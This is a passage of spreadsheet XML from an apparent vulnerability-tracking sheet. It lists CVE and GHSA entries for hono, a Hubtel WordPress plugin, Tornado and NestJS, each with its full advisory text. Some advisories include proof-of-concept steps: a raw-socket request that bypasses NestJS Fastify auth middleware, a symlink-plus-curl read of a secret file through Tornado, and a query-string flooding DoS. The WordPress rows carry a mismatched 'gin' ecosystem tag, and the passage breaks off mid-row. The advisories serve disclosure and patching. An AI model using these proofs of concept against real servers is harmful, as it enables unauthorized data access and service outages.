        <v>0.002</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr">
        <is>
          <t>npm:hono</t>
        </is>
      </c>
      <c r="M221" s="5" t="inlineStr">
        <is>
          <t>4.13.7</t>
        </is>
      </c>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr"/>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>### Summary
`hono/jsx` does not HTML-escape a plain string placed directly as a child or `fallback` of `Suspense` or `ErrorBoundary`, as the only child of a `Context.Provider`, or as the root value of `renderToString()` / `renderToReadableStream()` from `hono/jsx/dom/server`. Such a string is emitted as markup instead of text.
### Details
These paths stringify their input and treat the result as already-escaped HTML, so a plain string passes through unchanged. Notable cases:
- `Suspense`: a string child, or a string `fallback` while a child suspends. With streaming, the fallback reaches the browser in the initial chunk.
- `ErrorBoundary`: a string child alongside an asynchronous sibling. The all-synchronous case was fixed in 4.11.7 (GHSA-9r54-q6cx-xmh5).
- `Context.Provider`: a single string child. Multiple children are escaped.
- `hono/jsx/dom/server`: a string, or an array containing strings, passed as the root.
A lone `{children}` forwarded by a wrapper component is enough to reach these paths. Strings wrapped in an element, values from `raw()` or the `html` helper, and client-side rendering with `hono/jsx/dom` are not affected.
### Impact
An attacker who controls a string rendered in an affected position can inject arbitrary HTML into the server-rendered page, leading to cross-site scripting under the application's origin.
This issue affects applications that render untrusted strings directly in one of the positions above during server-side rendering.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93981</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96173</t>
        </is>
      </c>
      <c r="D222" s="5" t="inlineStr"/>
      <c r="E222" s="5" t="inlineStr"/>
      <c r="F222" s="5" t="inlineStr"/>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr"/>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>The Payments for Hubtel WordPress plugin before 1.0.2 does not verify that the requester is authorized to view an order before redirecting a public payment-callback request, allowing unauthenticated attackers to obtain the order key of an arbitrary order and view its contents.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96173</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96200</t>
        </is>
      </c>
      <c r="D223" s="5" t="inlineStr"/>
      <c r="E223" s="5" t="inlineStr"/>
      <c r="F223" s="5" t="inlineStr"/>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr"/>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>The Payments for Hubtel WordPress plugin before 1.0.2 does not verify that payment notifications received by its payment callback come from the payment provider, allowing unauthenticated attackers to mark arbitrary orders as paid without payment.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96200</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96255</t>
        </is>
      </c>
      <c r="D224" s="5" t="inlineStr"/>
      <c r="E224" s="5" t="inlineStr"/>
      <c r="F224" s="5" t="inlineStr"/>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr"/>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>The Payments for Hubtel WordPress plugin before 1.0.2 does not prevent public access to a debug log in which it records payment requests, including the store's payment gateway API credentials in plain text, allowing unauthenticated attackers to obtain those credentials.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96255</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>GHSA-3hv7-mjh2-fv65</t>
        </is>
      </c>
      <c r="D225" s="5" t="inlineStr"/>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M225" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr"/>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>## Summary
`HTTPServerRequest.__init__` in `tornado/httputil.py` parses the URL query string via
`parse_qs_bytes()` with no field-count limit — while the sibling POST-body parsing path
(`parse_body_arguments`) received a `max_num_fields=1000` cap added earlier in this exact
same release (v6.5.8, commit `8d6363ed`), explicitly to bound parsing cost for the identical
underlying primitive. This leaves the query-string path with the resource-exhaustion exposure
the body-path fix was meant to close.
**File**: `tornado/httputil.py`, line 553 (`HTTPServerRequest.__init__`)
### Root Cause
```python
# tornado/httputil.py:553 (before fix)
self.arguments = parse_qs_bytes(self.query, keep_blank_values=True)
```
Compare with the POST-body path fixed one commit earlier in the same release:
```python
# tornado/httputil.py:1038-1041
uri_arguments = parse_qs_bytes(
    body,
    keep_blank_values=True,
    max_num_fields=config.urlencoded.max_arguments,  # default 1000
)
```
Both call sites funnel through the same `tornado.escape.parse_qs_bytes` (a thin wrapper over
`urllib.parse.parse_qs`), which is exactly why `max_num_fields` was added to
`urllib.parse.parse_qsl` upstream — to let frameworks bound field count. The fix was applied
only to the body path; the query-string path was missed.
The request line + headers together are capped at `max_header_size` (default 65536 bytes), so
this is not literally unbounded, but a single ~64KB request line can carry thousands of short
`key=value` pairs — far beyond the 1000-field limit the maintainer judged appropriate for the
structurally identical body case.
### Attack Scenario
1. Attacker sends a `GET` request whose query string is packed with thousands of short fields
   (e.g. `k0=1&amp;k1=1&amp;...&amp;k7799=1`, ~61KB), fitting comfortably under `max_header_size`. No
   authentication, cookies, or prior state required.
2. Tornado accepts and parses this with no field-count cap, unlike the equivalent POST-body
   request (which is correctly rejected with 400 once &gt;1000 fields are present).
3. Parsing thousands of fields is CPU work performed synchronously inside Tornado's
   single-threaded `IOLoop`. Several such requests in flight concurrently stall the event
   loop, delaying processing of *all* other connections on that loop — not just the
   attacker's own request.
### Verification (dynamic, local reproduction against v6.5.8)
Ran the unmodified v6.5.8 source directly (no external dependencies needed) with a minimal
`tornado.web.Application` on `127.0.0.1:8888`.
- Identical 7800-field/~61KB payload sent as GET query string → `200 OK`; sent as POST body
  (`application/x-www-form-urlencoded`) → `400 Bad Request` (correctly rejected by the
  existing `max_num_fields` body-path limit). This confirms the asymmetry directly.
- Per-request parse cost: baseline (`/?a=1`) averaged 1.86ms; the 7800-field query string
  averaged 25.1ms (~13x).
- Event-loop-blocking amplification (raw-socket test, isolating server-side stall from
  client overhead): with 10 sequential baseline probe requests fired with no load, average
  latency was 1.47ms (max 5.9ms). With 5 concurrent 61KB/7800-field requests in flight,
  the same baseline probes averaged 13.0ms (max 118.1ms) — an **8.9x average slowdown** for
  unrelated clients, produced by ~305KB of unauthenticated attacker traffic.
### Impact
All Tornado servers/applications are affected — this triggers on every request with a query
string, independent of application/handler logic. An unauthenticated, unprivileged remote
attacker can measurably degrade response times for all other clients sharing the same
`IOLoop`, using a small amount of bandwidth and no special conditions. This is an
availability/DoS concern; no confidentiality or integrity impact.
### Recommended Fix
```python
# tornado/httputil.py — HTTPServerRequest.__init__
if uri is not None:
    self.path, sep, self.query = uri.partition("?")
try:
    self.arguments = parse_qs_bytes(
        self.query,
        keep_blank_values=True,
        max_num_fields=_DEFAULT_PARSE_BODY_CONFIG.urlencoded.max_arguments,
    )
except ValueError as e:
    raise HTTPInputError("Invalid query string: %s" % e) from e
```
This reuses the existing `ParseUrlEncodedConfig.max_arguments` default (1000) via the
module's `_DEFAULT_PARSE_BODY_CONFIG`, matching the POST-body limit and honoring any global
override via `set_parse_body_config()`. The `try/except` is necessary because — unlike
`parse_body_arguments`, which already wraps its call and converts `ValueError` into a clean
`HTTPInputError`/400 — the query-string call site currently has no such handling, so without
it, a request exceeding the limit would raise an uncaught `ValueError` instead of a clean 400.
Verified: with the fix applied, requests with ≤1000 query-string fields are unaffected;
requests with &gt;1000 fields are rejected with `400 Bad Request` (consistent with the POST-body
behavior); Tornado's own `httputil_test` and `web_test` suites (256 tests) pass unchanged.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-3hv7-mjh2-fv65</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>GHSA-96h4-vgxj-gvm2</t>
        </is>
      </c>
      <c r="D226" s="5" t="inlineStr"/>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr">
        <is>
          <t>npm:@nestjs/microservices</t>
        </is>
      </c>
      <c r="M226" s="5" t="inlineStr">
        <is>
          <t>11.2.5, 12.0.3</t>
        </is>
      </c>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr"/>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>## Summary
A peer that can open a TCP connection to a NestJS microservice using the built-in TCP
transport can make the server process allocate memory without limit, on either side of the
connection, until the process is killed by the OS or by its container memory limit. No
authentication, no credentials, and no valid message are required.
Applications are affected only if they start a microservice with `Transport.TCP` and the
transport's port is reachable by an untrusted peer.
## Affected versions
| Package | Affected | Patched |
|---|---|---|
| `@nestjs/microservices` | `&gt;= 12.0.0, &lt; 12.0.3` | **12.0.3** |
| `@nestjs/microservices` | `&lt; 11.2.5` | **11.2.5** |
The same code is present in the 10.x line and earlier. Those lines are end-of-life and
will not receive a patch; upgrade to a supported major.
Only `@nestjs/microservices` is affected. No other package needs updating for this issue.
## Details
Two independent paths let one peer grow the heap without bound.
### Partial packets are buffered with nothing to reap them
The TCP transport frames messages as `&lt;length&gt;#&lt;payload&gt;`. A peer may declare a length,
send part of the payload, and then stop. `JsonSocket` keeps the partial payload buffered
while it waits for the rest, and nothing ever reclaimed it: there was no socket timeout, no
cap on the number of connections, and no tracking of accepted sockets.
`maxBufferSize` did not close this. It caps a single connection, defaulting to 128M
characters, and is enforced per connection, so the effective ceiling was the number of
connections an attacker chose to open.
Ten connections that each send 20MB and then go silent:
| | rss | heapUsed |
|---|---|---|
| baseline | 152.3MB | 28.1MB |
| after 200MB sent, all stalled | 561.2MB | 229.5MB |
The memory was held for as long as the connections stayed open. Closing them released it,
so a peer could hold it indefinitely at negligible cost to itself.
### Response backpressure was ignored
`JsonSocket#handleSend` discarded the return value of `socket.write`. A peer that issues
requests and never reads the responses therefore made the process queue every response in
memory, with no ceiling and no signal to stop producing more.
Thirty requests from a client whose stream is paused, against a handler returning an 8MB
payload, grew rss from 152.4MB to 419.1MB. The amplification here is roughly 1:1, because
the response size is set by the application rather than by the attacker; the defect is that
the server buffers all of it rather than applying backpressure or giving up.
## Impact
An unauthenticated peer that can reach the transport's port can drive the process to an
out-of-memory kill. Under a container memory limit this is fast and repeatable, and it
restarts the pod rather than merely degrading it.
There is no confidentiality or integrity impact. Nothing is read, written, or executed;
the failure mode is availability only.
Applications are not affected if the TCP transport is not used, or if the transport's port
is reachable only by trusted peers.
## Patches
Upgrade `@nestjs/microservices` to **12.0.3** or **11.2.5**.
Three changes landed together:
- **A stall timer drops a peer that stops sending mid-packet.** It is armed only while a
  packet is partially received and is refreshed on every read, so a slow but progressing
  transfer is never interrupted and a peer sitting idle between packets is left alone.
  Configurable as `incompleteMessageTimeout`, default 30000ms.
- **Reading is suspended while a peer's outgoing buffer is backed up** and resumes on
  `drain`, so a peer that stops reading cannot keep issuing requests.
- **Responses queued for a peer that reads nothing are capped.** Suspending reads is not
  sufficient on its own, because message handlers are asynchronous: a burst of pipelined
  requests is dispatched before the first response is written, and those responses still
  queue. Configurable as `maxSendBufferSize`, default 128MB.
Both limits are configurable on the server and on the client, and either can be disabled by
setting it to `0`.
### Behaviour change
Both limits are enabled by default, following the precedent set by `maxBufferSize`. A peer
that stops sending mid-packet for 30 seconds, or that lets more than 128MB of responses
queue unread on a single connection, is now disconnected where previously it was not.
The send cap can also drop a peer that is genuinely reading, if responses are produced
faster than the socket drains for long enough. The default is set high for that reason.
Applications that stream very large responses to deliberately slow consumers should raise
`maxSendBufferSize` or set it to `0`.
## Workarounds
For anyone who cannot upgrade immediately:
- **Restrict who can reach the port.** The TCP transport is designed for trusted
  service-to-service traffic. A network policy, security group, or L4 firewall that limits
  the port to known peers removes the exposure entirely, and is worth doing regardless of
  version.
- **Lower `maxBufferSize`.** This reduces what a single connection can pin on the receive
  side. It does not bound the total, because the limit is per connection and the number of
  connections is not capped, and it does nothing for the response-queueing path.
- **Supply a custom `socketClass`.** An application-provided socket class can implement its
  own idle timeout and backpressure handling. This is the only pre-patch mitigation that
  addresses the sending side.
Setting a process memory limit does not mitigate this. It converts the failure from an
out-of-memory kill of the host into an out-of-memory kill of the process.
## Credit
Reported by Salman Aljardan, who provided a detailed write-up and self-contained proofs of
concept for each issue, and coordinated disclosure.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-96h4-vgxj-gvm2</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>GHSA-9c5c-9qcx-q35q</t>
        </is>
      </c>
      <c r="D227" s="5" t="inlineStr"/>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr">
        <is>
          <t>npm:@nestjs/platform-fastify</t>
        </is>
      </c>
      <c r="M227" s="5" t="inlineStr">
        <is>
          <t>11.2.4, 12.0.2</t>
        </is>
      </c>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr"/>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>| Field | Value |
| --- | --- |
| Ecosystem | npm |
| Package | `@nestjs/platform-fastify` |
| Affected versions | `&gt;= 12.0.0, &lt; 12.0.2` and `&lt; 11.2.4` |
| Patched versions | `12.0.2` and `11.2.4` (upgrade to `12.0.3` / `11.2.5`) |
### Summary
On the Fastify adapter, an HTTP request that uses an **absolute-form request target** (`GET http://host/path HTTP/1.1`
instead of `GET /path HTTP/1.1`) reaches the route handler without running the path-scoped Nest middleware bound to
that route. Applications that enforce authentication or authorization in middleware execute the protected handler
with those checks skipped.
### Impact
Any application that
- uses `@nestjs/platform-fastify`, and
- binds middleware to specific paths via `MiddlewareConsumer.forRoutes(...)` or `.exclude(...)`, and
- is reachable by a client that controls the raw request line.
Node's HTTP server accepts absolute-form targets, so no special server configuration is needed. Exposure is reduced
when a reverse proxy in front of the application rewrites the request target to origin-form, which most do.
Where the bypassed middleware performs authentication or authorization, the result is an authentication or
authorization bypass. Where it performs logging, rate limiting or body handling, those are silently skipped instead.
### Details
Fastify's router (`find-my-way`) resolves an absolute-form target to its path before matching, so the route handler
is dispatched normally. Two places on the middleware side matched against the **raw** request target instead:
1. The bundled copy of the `@fastify/middie` engine at `packages/platform-fastify/adapters/middie/fastify-middie.ts`.
   NestJS carried this fork to apply an earlier path-decoding fix and it did not track the upstream absolute-form fix
   released in `@fastify/middie@9.3.4`.
2. `FastifyAdapter`'s own re-check in `createMiddlewareFactory()`, which tests the middleware path regexp against
   `req.originalUrl`.
Both normalized and percent-decoded the target, but neither resolved absolute-form to a path, so the router and the
middleware layer disagreed about which path was being requested.
A second, related defect contributed. Because the adapter always passes `routerOptions` (to install the version
constraint), Fastify did not reflect the deprecated **top-level** router options (`ignoreTrailingSlash`,
`ignoreDuplicateSlashes`, `caseSensitive`, `useSemicolonDelimiter`) in `initialConfig.routerOptions`, which is what
the middleware engine reads. Applications passing those options at the top level had middleware normalize paths
differently from the router, which widened the mismatch.
### Proof of concept
```ts
@Controller('users')
export class UsersController {
  @Get()
  findAll() {
    return 'protected data';
  }
}
@Module({ controllers: [UsersController] })
export class AppModule implements NestModule {
  configure(consumer: MiddlewareConsumer) {
    consumer
      .apply((req, res) =&gt; res.end('blocked by auth middleware'))
      .forRoutes({ path: 'users', method: RequestMethod.GET });
  }
}
```
`supertest` and `light-my-request` always emit origin-form targets, so the request has to be written to the socket:
```js
const { connect } = require('node:net');
const socket = connect(3000, '127.0.0.1', () =&gt; {
  socket.write(
    'GET http://127.0.0.1:3000/users HTTP/1.1\r\n' +
      'Host: 127.0.0.1:3000\r\n' +
      'Connection: close\r\n\r\n',
  );
});
socket.pipe(process.stdout);
```
Observed on an affected version: `protected data` — the middleware did not run.
Expected, and observed on a patched version: `blocked by auth middleware`.
### Patches
Fixed in **12.0.2** and **11.2.4**. Upgrading to **12.0.3** or **11.2.5** is recommended.
- The bundled `@fastify/middie` fork was removed and the package now depends on `@fastify/middie@9.3.4`, which
  resolves absolute-form targets before matching.
- The adapter resolves absolute-form targets in its own route check, mirroring `find-my-way`.
- Deprecated top-level Fastify router options are folded into `routerOptions` so the middleware engine and the
  router normalize paths identically.
### Workarounds
If you cannot upgrade, reject non-origin-form request targets before middleware runs. Register the hook on the
Fastify instance **before the application is initialized**, so that it runs ahead of the middleware engine's own
`onRequest` hook, and confirm with the request above that the rejection takes effect:
```ts
const adapter = new FastifyAdapter();
adapter.getInstance().addHook('onRequest', (request, reply, done) =&gt; {
  const target = request.raw.url ?? '';
  // "*" is the legitimate request target of "OPTIONS * HTTP/1.1"
  if (target[0] !== '/' &amp;&amp; target !== '*') {
    reply.code(400).send();
    return;
  }
  done();
});
```
Rejecting or normalizing absolute-form targets at a reverse proxy in front of the application is equally effective.
### Credit
Reported by ZeroVuln Labs.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-9c5c-9qcx-q35q</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>GHSA-c2m8-h5v5-343r</t>
        </is>
      </c>
      <c r="D228" s="5" t="inlineStr"/>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M228" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr"/>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>### Summary
StaticFileHandler allows an unauthenticated attacker to read arbitrary files from the server's filesystem by requesting a path that resolves to a symbolic link placed inside the static root directory. Any application that serves user-uploadable content, or whose static directory is populated by a build/deploy pipeline that creates symlinks (e.g. npm link, webpack, Docker volume mounts, CDN sync tools), is affected. An attacker who can trigger the creation of a symlink pointing outside the static root—or exploit one that already exists—can retrieve sensitive files such as /etc/passwd, private keys, configuration files, or application secrets.
### Details
The vulnerability is in tornado.web.StaticFileHandler, specifically in the interaction between two methods in [tornado/web.py](vscode-webview://1grdaaa6v64itrol06qu70pq3d1b9h9im5c3npvvc9snaprc1q9f/tornado/web.py):
- [get_absolute_path](https://github.com/tornadoweb/tornado/blob/0ca3c5f8279d402b245718d16522bc18a8f5d958/tornado/web.py#L2932) uses `os.path.abspath()` to resolve the requested path:
- [validate_absolute_path](https://github.com/tornadoweb/tornado/blob/0ca3c5f8279d402b245718d16522bc18a8f5d958/tornado/web.py#L2935) uses the same `os.path.abspath()` on the root, then performs a string prefix check:
`os.path.abspath()` normalises . and .. segments but does not resolve symbolic links. As a result, a path like `/var/www/static/link` passes the `startswith("/var/www/static/")` check regardless of where `link` actually points.
Immediately after, `os.path.exists()` and `os.path.isfile()`  **do follow symlinks**, so the file they ultimately open is the symlink's target. The fix would be to replace os.path.abspath() with os.path.realpath() in both methods, so the resolved real path of the symlink target is validated against the root, not just its string representation inside the static directory.
### PoC
_Complete instructions, including specific configuration details, to reproduce the vulnerability._
Prerequisites: Python 3.x, Tornado installed.
1. Create the environment
```
mkdir -p /tmp/static
echo "DB_PASSWORD=s3cr3t" &gt; /tmp/secret.conf   
ln -s /tmp/secret.conf /tmp/static/config.conf 
```
2. Minimal vulnerable server (server.py):
```
import tornado.web, tornado.ioloop
app = tornado.web.Application([
    (r"/static/(.*)", tornado.web.StaticFileHandler, {"path": "/tmp/static"}),
])
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
```
3. Exploit:
`curl http://localhost:8888/static/config.conf`
### Impact
Any application using StaticFileHandler is potentially affected if:
- the static directory contains symlinks pointing outside it (common with build tooling), or
- the application allows file uploads into the static directory without stripping symlinks.
An unauthenticated remote attacker can read any file readable by the process user: application secrets, private TLS keys, database credentials, /etc/shadow, SSH keys, or source code (depending on the process's filesystem permissions).</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-c2m8-h5v5-343r</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>GHSA-chx6-46f5-w4vp</t>
        </is>
      </c>
      <c r="D229" s="5" t="inlineStr"/>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M229" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr"/>
      <c r="S229" s="5" t="inlineStr">
        <is>
